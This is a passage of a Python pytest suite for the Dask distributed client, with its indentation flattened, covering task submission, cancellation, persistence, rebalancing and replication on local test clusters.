assert all(s.tasks[f.key].who_has == {aws} for f in L)
assert {f.key for f in L}.issubset(s.loose_restrictions)
x = c.submit(inc, 15, workers="127.0.0.3", allow_other_workers=True)
yield x
assert s.tasks[x.key].who_has
assert x.key in s.loose_restrictions
L = c.map(inc, range(15, 25), workers="127.0.0.3", allow_other_workers=True)
yield wait(L)
assert all(s.tasks[f.key].who_has for f in L)
assert {f.key for f in L}.issubset(s.loose_restrictions)
with pytest.raises(ValueError):
c.submit(inc, 1, allow_other_workers=True)
with pytest.raises(ValueError):
c.map(inc, [1], allow_other_workers=True)
with pytest.raises(TypeError):
c.submit(inc, 20, workers="127.0.0.1", allow_other_workers="Hello!")
with pytest.raises(TypeError):
c.map(inc, [20], workers="127.0.0.1", allow_other_workers="Hello!")
@pytest.mark.skipif("True", reason="because")
def test_bad_address():
try:
Client("123.123.123.123:1234", timeout=0.1)
except (IOError, gen.TimeoutError) as e:
assert "connect" in str(e).lower()
try:
Client("127.0.0.1:1234", timeout=0.1)
except (IOError, gen.TimeoutError) as e:
assert "connect" in str(e).lower()
@gen_cluster(client=True)
def test_long_error(c, s, a, b):
def bad(x):
raise ValueError("a" * 100000)
x = c.submit(bad, 10)
try:
yield x
except ValueError as e:
assert len(str(e)) < 100000
tb = yield x.traceback()
assert all(
len(line) < 100000
for line in concat(traceback.extract_tb(tb))
if isinstance(line, str)
)
@gen_cluster(client=True)
def test_map_on_futures_with_kwargs(c, s, a, b):
def f(x, y=10):
return x + y
futures = c.map(inc, range(10))
futures2 = c.map(f, futures, y=20)
results = yield c.gather(futures2)
assert results == [i + 1 + 20 for i in range(10)]
future = c.submit(inc, 100)
future2 = c.submit(f, future, y=200)
result = yield future2
assert result == 100 + 1 + 200
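# Helper classes whose unpickling is deliberately broken: BadlySerializedObject
# raises on deserialization, FatallySerializedObject exits the process instead.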
class BadlySerializedObject(object):
def __getstate__(self):
return 1
def __setstate__(self, state):
raise TypeError("hello!")
class FatallySerializedObject(object):
def __getstate__(self):
return 1
def __setstate__(self, state):
print("This should never have been deserialized, closing")
import sys
sys.exit(0)
@gen_cluster(client=True)
def test_badly_serialized_input(c, s, a, b):
o = BadlySerializedObject()
future = c.submit(inc, o)
futures = c.map(inc, range(10))
L = yield c.gather(futures)
assert list(L) == list(map(inc, range(10)))
assert future.status == "error"
@pytest.mark.skipif("True", reason="")
def test_badly_serialized_input_stderr(capsys, c):
o = BadlySerializedObject()
future = c.submit(inc, o)
start = time()
while True:
sleep(0.01)
out, err = capsys.readouterr()
if "hello!" in err:
break
assert time() - start < 20
assert future.status == "error"
def test_repr(loop):
funcs = [str, repr, lambda x: x._repr_html_()]
with cluster(nworkers=3) as (s, [a, b, c]):
with Client(s["address"], loop=loop) as c:
for func in funcs:
text = func(c)
assert c.scheduler.address in text
assert "3" in text
for func in funcs:
text = func(c)
assert "not connected" in text
@gen_cluster(client=True)
def test_repr_async(c, s, a, b):
c._repr_html_()
@gen_cluster(client=True, worker_kwargs={"memory_limit": None})
def test_repr_no_memory_limit(c, s, a, b):
c._repr_html_()
@gen_test()
def test_repr_localcluster():
cluster = yield LocalCluster(
processes=False, dashboard_address=None, asynchronous=True
)
client = yield Client(cluster, asynchronous=True)
try:
text = client._repr_html_()
assert cluster.scheduler.address in text
assert is_valid_xml(client._repr_html_())
finally:
yield client.close()
yield cluster.close()
@gen_cluster(client=True)
def test_forget_simple(c, s, a, b):
x = c.submit(inc, 1, retries=2)
y = c.submit(inc, 2)
z = c.submit(add, x, y, workers=[a.ip], allow_other_workers=True)
yield wait([x, y, z])
assert not s.waiting_data.get(x.key)
assert not s.waiting_data.get(y.key)
assert set(s.tasks) == {x.key, y.key, z.key}
s.client_releases_keys(keys=[x.key], client=c.id)
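    # x is still a dependency of z, so releasing x alone must not forget it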
assert x.key in s.tasks
s.client_releases_keys(keys=[z.key], client=c.id)
assert x.key not in s.tasks
assert z.key not in s.tasks
assert not s.tasks[y.key].dependents
s.client_releases_keys(keys=[y.key], client=c.id)
assert not s.tasks
@gen_cluster(client=True)
def test_forget_complex(e, s, A, B):
a, b, c, d = yield e.scatter(list(range(4)))
ab = e.submit(add, a, b)
cd = e.submit(add, c, d)
ac = e.submit(add, a, c)
acab = e.submit(add, ac, ab)
yield wait([a, b, c, d, ab, ac, cd, acab])
assert set(s.tasks) == {f.key for f in [ab, ac, cd, acab, a, b, c, d]}
s.client_releases_keys(keys=[ab.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ab, ac, cd, acab, a, b, c, d]}
s.client_releases_keys(keys=[b.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ac, cd, acab, a, c, d]}
s.client_releases_keys(keys=[acab.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ac, cd, a, c, d]}
assert b.key not in s.tasks
start = time()
while b.key in A.data or b.key in B.data:
yield gen.sleep(0.01)
assert time() < start + 10
s.client_releases_keys(keys=[ac.key], client=e.id)
assert set(s.tasks) == {f.key for f in [cd, a, c, d]}
@gen_cluster(client=True)
def test_forget_in_flight(e, s, A, B):
delayed2 = partial(delayed, pure=True)
a, b, c, d = [delayed2(slowinc)(i) for i in range(4)]
ab = delayed2(slowadd)(a, b, dask_key_name="ab")
cd = delayed2(slowadd)(c, d, dask_key_name="cd")
ac = delayed2(slowadd)(a, c, dask_key_name="ac")
acab = delayed2(slowadd)(ac, ab, dask_key_name="acab")
x, y = e.compute([ac, acab])
s.validate_state()
for i in range(5):
yield gen.sleep(0.01)
s.validate_state()
s.client_releases_keys(keys=[y.key], client=e.id)
s.validate_state()
for k in [acab.key, ab.key, b.key]:
assert k not in s.tasks
@gen_cluster(client=True)
def test_forget_errors(c, s, a, b):
x = c.submit(div, 1, 0)
y = c.submit(inc, x)
z = c.submit(inc, y)
yield wait([y])
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key in s.exceptions_blame
s.client_releases_keys(keys=[z.key], client=c.id)
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key not in s.exceptions_blame
s.client_releases_keys(keys=[x.key], client=c.id)
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key not in s.exceptions_blame
s.client_releases_keys(keys=[y.key], client=c.id)
assert x.key not in s.exceptions
assert x.key not in s.exceptions_blame
assert y.key not in s.exceptions_blame
assert z.key not in s.exceptions_blame
def test_repr_sync(c):
s = str(c)
r = repr(c)
assert c.scheduler.address in s
assert c.scheduler.address in r
assert str(2) in s # nworkers
assert "cores" in s
@gen_cluster(client=True)
def test_waiting_data(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(add, x, y, workers=[a.ip], allow_other_workers=True)
yield wait([x, y, z])
assert not s.waiting_data.get(x.key)
assert not s.waiting_data.get(y.key)
@gen_cluster()
def test_multi_client(s, a, b):
c = yield Client(s.address, asynchronous=True)
f = yield Client(s.address, asynchronous=True)
assert set(s.client_comms) == {c.id, f.id}
x = c.submit(inc, 1)
y = f.submit(inc, 2)
y2 = c.submit(inc, 2)
assert y.key == y2.key
yield wait([x, y])
assert s.wants_what == {
c.id: {x.key, y.key},
f.id: {y.key},
"fire-and-forget": set(),
}
assert s.who_wants == {x.key: {c.id}, y.key: {c.id, f.id}}
yield c.close()
start = time()
while c.id in s.wants_what:
yield gen.sleep(0.01)
assert time() < start + 5
assert c.id not in s.wants_what
assert c.id not in s.who_wants[y.key]
assert x.key not in s.who_wants
yield f.close()
start = time()
while s.tasks:
yield gen.sleep(0.01)
assert time() < start + 2, s.tasks
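# Run in a child process: open a client, compute a result, then sleep so the
# connection stays alive until the process is killed from outside.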
def long_running_client_connection(address):
with pristine_loop():
c = Client(address)
x = c.submit(lambda x: x + 1, 10)
x.result()
sleep(100)
@gen_cluster()
def test_cleanup_after_broken_client_connection(s, a, b):
proc = mp_context.Process(target=long_running_client_connection, args=(s.address,))
proc.daemon = True
proc.start()
start = time()
while not s.tasks:
yield gen.sleep(0.01)
assert time() < start + 5
proc.terminate()
start = time()
while s.tasks:
yield gen.sleep(0.01)
assert time() < start + 5
@gen_cluster()
def test_multi_garbage_collection(s, a, b):
c = yield Client(s.address, asynchronous=True)
f = yield Client(s.address, asynchronous=True)
x = c.submit(inc, 1)
y = f.submit(inc, 2)
y2 = c.submit(inc, 2)
assert y.key == y2.key
yield wait([x, y])
x.__del__()
start = time()
while x.key in a.data or x.key in b.data:
yield gen.sleep(0.01)
assert time() < start + 5
assert s.wants_what == {c.id: {y.key}, f.id: {y.key}, "fire-and-forget": set()}
assert s.who_wants == {y.key: {c.id, f.id}}
y.__del__()
start = time()
while x.key in s.wants_what[f.id]:
yield gen.sleep(0.01)
assert time() < start + 5
yield gen.sleep(0.1)
assert y.key in a.data or y.key in b.data
assert s.wants_what == {c.id: {y.key}, f.id: set(), "fire-and-forget": set()}
assert s.who_wants == {y.key: {c.id}}
y2.__del__()
start = time()
while y.key in a.data or y.key in b.data:
yield gen.sleep(0.01)
assert time() < start + 5
assert not any(v for v in s.wants_what.values())
assert not s.who_wants
yield c.close()
yield f.close()
@gen_cluster(client=True)
def test__broadcast(c, s, a, b):
x, y = yield c.scatter([1, 2], broadcast=True)
assert a.data == b.data == {x.key: 1, y.key: 2}
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
def test__broadcast_integer(c, s, *workers):
x, y = yield c.scatter([1, 2], broadcast=2)
assert len(s.tasks[x.key].who_has) == 2
assert len(s.tasks[y.key].who_has) == 2
@gen_cluster(client=True)
def test__broadcast_dict(c, s, a, b):
d = yield c.scatter({"x": 1}, broadcast=True)
assert a.data == b.data == {"x": 1}
def test_broadcast(c, s, a, b):
x, y = c.scatter([1, 2], broadcast=True)
has_what = sync(c.loop, c.scheduler.has_what)
assert {k: set(v) for k, v in has_what.items()} == {
a["address"]: {x.key, y.key},
b["address"]: {x.key, y.key},
}
[z] = c.scatter([3], broadcast=True, workers=[a["address"]])
has_what = sync(c.loop, c.scheduler.has_what)
assert {k: set(v) for k, v in has_what.items()} == {
a["address"]: {x.key, y.key, z.key},
b["address"]: {x.key, y.key},
}
@gen_cluster(client=True)
def test_proxy(c, s, a, b):
msg = yield c.scheduler.proxy(msg={"op": "identity"}, worker=a.address)
assert msg["id"] == a.identity()["id"]
@gen_cluster(client=True)
def test__cancel(c, s, a, b):
x = c.submit(slowinc, 1)
y = c.submit(slowinc, x)
while y.key not in s.tasks:
yield gen.sleep(0.01)
yield c.cancel([x])
assert x.cancelled()
assert "cancel" in str(x)
s.validate_state()
start = time()
while not y.cancelled():
yield gen.sleep(0.01)
assert time() < start + 5
assert not s.tasks
s.validate_state()
@gen_cluster(client=True)
def test__cancel_tuple_key(c, s, a, b):
x = c.submit(inc, 1, key=("x", 0, 1))
result = yield x
yield c.cancel(x)
with pytest.raises(CancelledError):
yield x
@gen_cluster()
def test__cancel_multi_client(s, a, b):
c = yield Client(s.address, asynchronous=True)
f = yield Client(s.address, asynchronous=True)
x = c.submit(slowinc, 1)
y = f.submit(slowinc, 1)
assert x.key == y.key
yield c.cancel([x])
assert x.cancelled()
assert not y.cancelled()
start = time()
while y.key not in s.tasks:
yield gen.sleep(0.01)
assert time() < start + 5
out = yield y
assert out == 2
with pytest.raises(CancelledError):
yield x
yield c.close()
yield f.close()
@gen_cluster(client=True)
def test__cancel_collection(c, s, a, b):
L = c.map(double, [[1], [2], [3]])
x = db.Bag({("b", i): f for i, f in enumerate(L)}, "b", 3)
yield c.cancel(x)
yield c.cancel([x])
assert all(f.cancelled() for f in L)
assert not s.tasks
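# Cancelling y should also cancel its dependent z, while the independent x
# still completes normally.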
def test_cancel(c):
x = c.submit(slowinc, 1, key="x")
y = c.submit(slowinc, x, key="y")
z = c.submit(slowinc, y, key="z")
c.cancel([y])
start = time()
while not z.cancelled():
sleep(0.01)
assert time() < start + 5
assert x.result() == 2
z.cancel()
assert z.cancelled()
@gen_cluster(client=True)
def test_future_type(c, s, a, b):
x = c.submit(inc, 1)
yield wait([x])
assert x.type == int
assert "int" in str(x)
@gen_cluster(client=True)
def test_traceback_clean(c, s, a, b):
x = c.submit(div, 1, 0)
try:
yield x
except Exception as e:
f = e
exc_type, exc_value, tb = sys.exc_info()
while tb:
assert "scheduler" not in tb.tb_frame.f_code.co_filename
assert "worker" not in tb.tb_frame.f_code.co_filename
tb = tb.tb_next
@gen_cluster(client=True)
def test_map_different_lengths(c, s, a, b):
assert len(c.map(add, [1, 2], [1, 2, 3])) == 2
def test_Future_exception_sync_2(loop, capsys):
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
assert dask.base.get_scheduler() == c.get
out, err = capsys.readouterr()
assert len(out.strip().split("\n")) == 1
assert dask.base.get_scheduler() != c.get
@gen_cluster(timeout=60, client=True)
def test_async_persist(c, s, a, b):
from dask.delayed import delayed, Delayed
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
w = delayed(add)(y, z)
yy, ww = c.persist([y, w])
assert type(yy) == type(y)
assert type(ww) == type(w)
assert len(yy.dask) == 1
assert len(ww.dask) == 1
assert len(w.dask) > 1
assert y.__dask_keys__() == yy.__dask_keys__()
assert w.__dask_keys__() == ww.__dask_keys__()
while y.key not in s.tasks and w.key not in s.tasks:
yield gen.sleep(0.01)
assert s.who_wants[y.key] == {c.id}
assert s.who_wants[w.key] == {c.id}
yyf, wwf = c.compute([yy, ww])
yyy, www = yield c.gather([yyf, wwf])
assert yyy == inc(1)
assert www == add(inc(1), dec(1))
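    # persist preserves shape: a single collection in gives a single collection
    # out, a list in gives a list or tuple out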
assert isinstance(c.persist(y), Delayed)
assert isinstance(c.persist([y]), (list, tuple))
@gen_cluster(client=True)
def test__persist(c, s, a, b):
pytest.importorskip("dask.array")
import dask.array as da
x = da.ones((10, 10), chunks=(5, 10))
y = 2 * (x + 1)
assert len(y.dask) == 6
yy = c.persist(y)
assert len(y.dask) == 6
assert len(yy.dask) == 2
assert all(isinstance(v, Future) for v in yy.dask.values())
assert yy.__dask_keys__() == y.__dask_keys__()
g, h = c.compute([y, yy])
gg, hh = yield c.gather([g, h])
assert (gg == hh).all()
def test_persist(c):
pytest.importorskip("dask.array")
import dask.array as da
x = da.ones((10, 10), chunks=(5, 10))
y = 2 * (x + 1)
assert len(y.dask) == 6
yy = c.persist(y)
assert len(y.dask) == 6
assert len(yy.dask) == 2
assert all(isinstance(v, Future) for v in yy.dask.values())
assert yy.__dask_keys__() == y.__dask_keys__()
zz = yy.compute()
z = y.compute()
assert (zz == z).all()
@gen_cluster(timeout=60, client=True)
def test_long_traceback(c, s, a, b):
from distributed.protocol.pickle import dumps
def deep(n):
if n == 0:
1 / 0
else:
return deep(n - 1)
x = c.submit(deep, 200)
yield wait([x])
assert len(dumps(c.futures[x.key].traceback)) < 10000
assert isinstance(c.futures[x.key].exception, ZeroDivisionError)
@gen_cluster(client=True)
def test_wait_on_collections(c, s, a, b):
L = c.map(double, [[1], [2], [3]])
x = db.Bag({("b", i): f for i, f in enumerate(L)}, "b", 3)
yield wait(x)
assert all(f.key in a.data or f.key in b.data for f in L)
@gen_cluster(client=True)
def test_futures_of_get(c, s, a, b):
x, y, z = c.map(inc, [1, 2, 3])
assert set(futures_of(0)) == set()
assert set(futures_of(x)) == {x}
assert set(futures_of([x, y, z])) == {x, y, z}
assert set(futures_of([x, [y], [[z]]])) == {x, y, z}
assert set(futures_of({"x": x, "y": [y]})) == {x, y}
b = db.Bag({("b", i): f for i, f in enumerate([x, y, z])}, "b", 3)
assert set(futures_of(b)) == {x, y, z}
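    # futures_of also recurses into SubgraphCallable task graphs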
sg = SubgraphCallable(
{"x": x, "y": y, "z": z, "out": (add, (add, (add, x, y), z), "in")},
"out",
("in",),
)
assert set(futures_of(sg)) == {x, y, z}
def test_futures_of_class():
da = pytest.importorskip("dask.array")
assert futures_of([da.Array]) == []
@gen_cluster(client=True)
def test_futures_of_cancelled_raises(c, s, a, b):
x = c.submit(inc, 1)
yield c.cancel([x])
with pytest.raises(CancelledError):
yield x
with pytest.raises(CancelledError):
yield c.get({"x": (inc, x), "y": (inc, 2)}, ["x", "y"], sync=False)
with pytest.raises(CancelledError):
c.submit(inc, x)
with pytest.raises(CancelledError):
c.submit(add, 1, y=x)
with pytest.raises(CancelledError):
c.map(add, [1], y=x)
assert "y" not in s.tasks
@pytest.mark.skip
@gen_cluster(nthreads=[("127.0.0.1", 1)], client=True)
def test_dont_delete_recomputed_results(c, s, w):
x = c.submit(inc, 1) # compute first time
yield wait([x])
x.__del__() # trigger garbage collection
yield gen.moment
xx = c.submit(inc, 1) # compute second time
start = time()
while xx.key not in w.data: # data shows up
yield gen.sleep(0.01)
assert time() < start + 1
while time() < start + (s.delete_interval + 100) / 1000: # and stays
assert xx.key in w.data
yield gen.sleep(0.01)
@gen_cluster(nthreads=[], client=True)
def test_fatally_serialized_input(c, s):
o = FatallySerializedObject()
future = c.submit(inc, o)
while not s.tasks:
yield gen.sleep(0.01)
@pytest.mark.skip(reason="Use fast random selection now")
@gen_cluster(client=True)
def test_balance_tasks_by_stacks(c, s, a, b):
x = c.submit(inc, 1)
yield wait(x)
y = c.submit(inc, 2)
yield wait(y)
assert len(a.data) == len(b.data) == 1
@gen_cluster(client=True)
def test_run(c, s, a, b):
results = yield c.run(inc, 1)
assert results == {a.address: 2, b.address: 2}
results = yield c.run(inc, 1, workers=[a.address])
assert results == {a.address: 2}
results = yield c.run(inc, 1, workers=[])
assert results == {}
@gen_cluster(client=True)
def test_run_handles_picklable_data(c, s, a, b):
futures = c.map(inc, range(10))
yield wait(futures)
def func():
return {}, set(), [], (), 1, "hello", b"100"
results = yield c.run_on_scheduler(func)
assert results == func()
results = yield c.run(func)
assert results == {w.address: func() for w in [a, b]}
def test_run_sync(c, s, a, b):
def func(x, y=10):
return x + y
result = c.run(func, 1, y=2)
assert result == {a["address"]: 3, b["address"]: 3}
result = c.run(func, 1, y=2, workers=[a["address"]])
assert result == {a["address"]: 3}
@gen_cluster(client=True)
def test_run_coroutine(c, s, a, b):
results = yield c.run(geninc, 1, delay=0.05)
assert results == {a.address: 2, b.address: 2}
results = yield c.run(geninc, 1, delay=0.05, workers=[a.address])
assert results == {a.address: 2}
results = yield c.run(geninc, 1, workers=[])
assert results == {}
with pytest.raises(RuntimeError, match="hello"):
yield c.run(throws, 1)
if sys.version_info >= (3, 5):
results = yield c.run(asyncinc, 2, delay=0.01)
assert results == {a.address: 3, b.address: 3}
def test_run_coroutine_sync(c, s, a, b):
result = c.run(geninc, 2, delay=0.01)
assert result == {a["address"]: 3, b["address"]: 3}
result = c.run(geninc, 2, workers=[a["address"]])
assert result == {a["address"]: 3}
t1 = time()
result = c.run(geninc, 2, delay=10, wait=False)
t2 = time()
assert result is None
assert t2 - t1 <= 1.0
def test_run_exception(c):
def raise_exception(exc_type, exc_msg):
raise exc_type(exc_msg)
for exc_type in [ValueError, RuntimeError]:
with pytest.raises(exc_type, match="informative message"):
c.run(raise_exception, exc_type, "informative message")
def test_diagnostic_ui(loop):
with cluster() as (s, [a, b]):
a_addr = a["address"]
b_addr = b["address"]
with Client(s["address"], loop=loop) as c:
d = c.nthreads()
assert d == {a_addr: 1, b_addr: 1}
d = c.nthreads([a_addr])
assert d == {a_addr: 1}
d = c.nthreads(a_addr)
assert d == {a_addr: 1}
d = c.nthreads(a["address"])
assert d == {a_addr: 1}
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(inc, 3)
wait([x, y, z])
d = c.who_has()
assert set(d) == {x.key, y.key, z.key}
assert all(w in [a_addr, b_addr] for v in d.values() for w in v)
assert all(d.values())
d = c.who_has([x, y])
assert set(d) == {x.key, y.key}
d = c.who_has(x)
assert set(d) == {x.key}
d = c.has_what()
assert set(d) == {a_addr, b_addr}
assert all(k in [x.key, y.key, z.key] for v in d.values() for k in v)
d = c.has_what([a_addr])
assert set(d) == {a_addr}
d = c.has_what(a_addr)
assert set(d) == {a_addr}
def test_diagnostic_nbytes_sync(c):
incs = c.map(inc, [1, 2, 3])
doubles = c.map(double, [1, 2, 3])
wait(incs + doubles)
assert c.nbytes(summary=False) == {k.key: sizeof(1) for k in incs + doubles}
assert c.nbytes(summary=True) == {"inc": sizeof(1) * 3, "double": sizeof(1) * 3}
@gen_cluster(client=True)
def test_diagnostic_nbytes(c, s, a, b):
incs = c.map(inc, [1, 2, 3])
doubles = c.map(double, [1, 2, 3])
yield wait(incs + doubles)
assert s.get_nbytes(summary=False) == {k.key: sizeof(1) for k in incs + doubles}
assert s.get_nbytes(summary=True) == {"inc": sizeof(1) * 3, "double": sizeof(1) * 3}
@gen_test()
def test_worker_aliases():
s = yield Scheduler(validate=True, port=0)
a = Worker(s.address, name="alice")
b = Worker(s.address, name="bob")
w = Worker(s.address, name=3)
yield [a, b, w]
c = yield Client(s.address, asynchronous=True)
L = c.map(inc, range(10), workers="alice")
future = yield c.scatter(123, workers=3)
yield wait(L)
assert len(a.data) == 10
assert len(b.data) == 0
assert dict(w.data) == {future.key: 123}
for i, alias in enumerate([3, [3], "alice"]):
result = yield c.submit(lambda x: x + 1, i, workers=alias)
assert result == i + 1
yield c.close()
yield [a.close(), b.close(), w.close()]
yield s.close()
def test_persist_get_sync(c):
dadd = delayed(add)
x, y = delayed(1), delayed(2)
xx = delayed(add)(x, x)
yy = delayed(add)(y, y)
xxyy = delayed(add)(xx, yy)
xxyy2 = c.persist(xxyy)
xxyy3 = delayed(add)(xxyy2, 10)
assert xxyy3.compute() == ((1 + 1) + (2 + 2)) + 10
@gen_cluster(client=True)
def test_persist_get(c, s, a, b):
dadd = delayed(add)
x, y = delayed(1), delayed(2)
xx = delayed(add)(x, x)
yy = delayed(add)(y, y)
xxyy = delayed(add)(xx, yy)
xxyy2 = c.persist(xxyy)
xxyy3 = delayed(add)(xxyy2, 10)
yield gen.sleep(0.5)
result = yield c.get(xxyy3.dask, xxyy3.__dask_keys__(), sync=False)
assert result[0] == ((1 + 1) + (2 + 2)) + 10
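    # computing the same persisted graph repeatedly must keep giving the same result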
result = yield c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
result = yield c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
result = yield c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
def test_client_num_fds(loop):
psutil = pytest.importorskip("psutil")
with cluster() as (s, [a, b]):
proc = psutil.Process()
with Client(s["address"], loop=loop) as c: # first client to start loop
before = proc.num_fds() # measure
for i in range(4):
with Client(s["address"], loop=loop): # start more clients
pass
start = time()
while proc.num_fds() > before:
sleep(0.01)
assert time() < start + 4
@gen_cluster()
def test_startup_close_startup(s, a, b):
c = yield Client(s.address, asynchronous=True)
yield c.close()
c = yield Client(s.address, asynchronous=True)
yield c.close()
def test_startup_close_startup_sync(loop):
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
sleep(0.1)
with Client(s["address"]) as c:
pass
with Client(s["address"]) as c:
pass
sleep(0.1)
with Client(s["address"]) as c:
pass
@gen_cluster(client=True)
def test_badly_serialized_exceptions(c, s, a, b):
def f():
class BadlySerializedException(Exception):
def __reduce__(self):
raise TypeError()
raise BadlySerializedException("hello world")
x = c.submit(f)
try:
result = yield x
except Exception as e:
assert "hello world" in str(e)
else:
assert False
@gen_cluster(client=True)
def test_rebalance(c, s, a, b):
aws = s.workers[a.address]
bws = s.workers[b.address]
x, y = yield c.scatter([1, 2], workers=[a.address])
assert len(a.data) == 2
assert len(b.data) == 0
s.validate_state()
yield c.rebalance()
s.validate_state()
assert len(b.data) == 1
assert {ts.key for ts in bws.has_what} == set(b.data)
assert bws in s.tasks[x.key].who_has or bws in s.tasks[y.key].who_has
assert len(a.data) == 1
assert {ts.key for ts in aws.has_what} == set(a.data)
assert aws not in s.tasks[x.key].who_has or aws not in s.tasks[y.key].who_has
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 4, client=True)
def test_rebalance_workers(e, s, a, b, c, d):
w, x, y, z = yield e.scatter([1, 2, 3, 4], workers=[a.address])
assert len(a.data) == 4
assert len(b.data) == 0
assert len(c.data) == 0
assert len(d.data) == 0
yield e.rebalance([x, y], workers=[a.address, c.address])
assert len(a.data) == 3
assert len(b.data) == 0
assert len(c.data) == 1
assert len(d.data) == 0
assert c.data == {x.key: 2} or c.data == {y.key: 3}
yield e.rebalance()
assert len(a.data) == 1
assert len(b.data) == 1
assert len(c.data) == 1
assert len(d.data) == 1
s.validate_state()
@gen_cluster(client=True)
def test_rebalance_execution(c, s, a, b):
futures = c.map(inc, range(10), workers=a.address)
yield c.rebalance(futures)
assert len(a.data) == len(b.data) == 5
s.validate_state()
def test_rebalance_sync(c, s, a, b):
futures = c.map(inc, range(10), workers=[a["address"]])
c.rebalance(futures)
has_what = c.has_what()
assert len(has_what) == 2
assert list(valmap(len, has_what).values()) == [5, 5]
@gen_cluster(client=True)
def test_rebalance_unprepared(c, s, a, b):
futures = c.map(slowinc, range(10), delay=0.05, workers=a.address)
yield gen.sleep(0.1)
yield c.rebalance(futures)
s.validate_state()
@gen_cluster(client=True)
def test_receive_lost_key(c, s, a, b):
x = c.submit(inc, 1, workers=[a.address])
result = yield x
yield a.close()
start = time()
while x.status == "finished":
assert time() < start + 5
yield gen.sleep(0.01)
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
def test_unrunnable_task_runs(c, s, a, b):
x = c.submit(inc, 1, workers=[a.ip])
result = yield x
yield a.close()
start = time()
while x.status == "finished":
assert time() < start + 5
yield gen.sleep(0.01)
assert s.tasks[x.key] in s.unrunnable
assert s.get_task_status(keys=[x.key]) == {x.key: "no-worker"}
w = yield Worker(s.address, loop=s.loop)
start = time()
while x.status != "finished":
assert time() < start + 2
yield gen.sleep(0.01)
assert s.tasks[x.key] not in s.unrunnable
result = yield x
assert result == 2
yield w.close()
@gen_cluster(client=True, nthreads=[])
def test_add_worker_after_tasks(c, s):
futures = c.map(inc, range(10))
n = yield Nanny(s.address, nthreads=2, loop=s.loop, port=0)
result = yield c.gather(futures)
yield n.close()
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
def test_workers_register_indirect_data(c, s, a, b):
[x] = yield c.scatter([1], workers=a.address)
y = c.submit(inc, x, workers=b.ip)
yield y
assert b.data[x.key] == 1
assert s.tasks[x.key].who_has == {s.workers[a.address], s.workers[b.address]}
assert s.workers[b.address].has_what == {s.tasks[x.key], s.tasks[y.key]}
s.validate_state()
@gen_cluster(client=True)
def test_submit_on_cancelled_future(c, s, a, b):
x = c.submit(inc, 1)
yield x
yield c.cancel(x)
with pytest.raises(CancelledError):
y = c.submit(inc, x)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
def test_replicate(c, s, *workers):
[a, b] = yield c.scatter([1, 2])
yield s.replicate(keys=[a.key, b.key], n=5)
s.validate_state()
assert len(s.tasks[a.key].who_has) == 5
assert len(s.tasks[b.key].who_has) == 5
assert sum(a.key in w.data for w in workers) == 5
assert sum(b.key in w.data for w in workers) == 5
@gen_cluster(client=True)
def test_replicate_tuple_keys(c, s, a, b):
x = delayed(inc)(1, dask_key_name=("x", 1))
f = c.persist(x)
yield c.replicate(f, n=5)
s.validate_state()
assert a.data and b.data
yield c.rebalance(f)
s.validate_state()
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
def test_replicate_workers(c, s, *workers):
[a, b] = yield c.scatter([1, 2], workers=[workers[0].address])
yield s.replicate(
keys=[a.key, b.key], n=5, workers=[w.address for w in workers[:5]]
)
assert len(s.tasks[a.key].who_has) == 5
assert len(s.tasks[b.key].who_has) == 5
assert sum(a.key in w.data for w in workers[:5]) == 5
assert sum(b.key in w.data for w in workers[:5]) == 5
assert sum(a.key in w.data for w in workers[5:]) == 0
assert sum(b.key in w.data for w in workers[5:]) == 0
yield s.replicate(keys=[a.key, b.key], n=1)
assert len(s.tasks[a.key].who_has) == 1
assert len(s.tasks[b.key].who_has) == 1
assert sum(a.key in w.data for w in workers) == 1
assert sum(b.key in w.data for w in workers) == 1
s.validate_state()
yield s.replicate(keys=[a.key, b.key], n=None) # all
assert len(s.tasks[a.key].who_has) == 10
assert len(s.tasks[b.key].who_has) == 10
s.validate_state()
yield s.replicate(
keys=[a.key, b.key], n=1, workers=[w.address for w in workers[:5]]
)
assert sum(a.key in w.data for w in workers[:5]) == 1
assert sum(b.key in w.data for w in workers[:5]) == 1
assert sum(a.key in w.data for w in workers[5:]) == 5
assert sum(b.key in w.data for w in workers[5:]) == 5
s.validate_state()
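# CountSerialization's __setstate__ increments a counter, so each copy records
# how many serialize/deserialize hops it took; replicate() fanning out in a
# tree should yield at least one copy with a count greater than one.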
class CountSerialization(object):
def __init__(self):
self.n = 0
def __setstate__(self, n):
self.n = n + 1
def __getstate__(self):
return self.n
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
def test_replicate_tree_branching(c, s, *workers):
obj = CountSerialization()
[future] = yield c.scatter([obj])
yield s.replicate(keys=[future.key], n=10)
max_count = max(w.data[future.key].n for w in workers)
assert max_count > 1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
def test_client_replicate(c, s, *workers):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
yield c.replicate([x, y], n=5)
assert len(s.tasks[x.key].who_has) == 5
assert len(s.tasks[y.key].who_has) == 5
yield c.replicate([x, y], n=3)
